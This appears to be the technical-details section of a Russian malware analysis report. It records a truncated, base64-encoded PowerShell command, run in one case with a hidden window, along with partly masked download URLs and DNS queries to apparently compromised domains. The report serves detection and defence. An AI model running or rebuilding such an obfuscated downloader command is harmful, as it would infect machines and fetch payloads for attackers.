Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABMADAAcQBkAGcAdwB1AD0AWwBjAGgAYQByAF0ANAAyADsAJABSAGMAYQBlADUAbgBqAD0AKAAnAEkAMQAnACsAKAAnAHQAcQAnACsAJwBfAHQAMAAnACkAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AJwArACcAaQB0AGUAbQ...
- http://ma###erver.com/wp-content/T/
- http://my####ompany.com/
- http://kl##u.com/sys-cache/hE/
- DNS ASK ma###erver.com
- DNS ASK my####ompany.com
- DNS ASK kl##u.com
- DNS ASK ae####ticscc.com
- DNS ASK ka###rweb.com
- DNS ASK ar####portjogja.com
- DNS ASK ca####vi2020.com
- DNS ASK te###cpa.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABMADAAcQBkAGcAdwB1AD0AWwBjAGgAYQByAF0ANAAyADsAJABSAGMAYQBlADUAbgBqAD0AKAAnAEkAMQAnACsAKAAnAHQAcQAnACsAJwBfAHQAMAAnACkAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AJwArACcAaQB0AGUAbQ...' (со скрытым окном)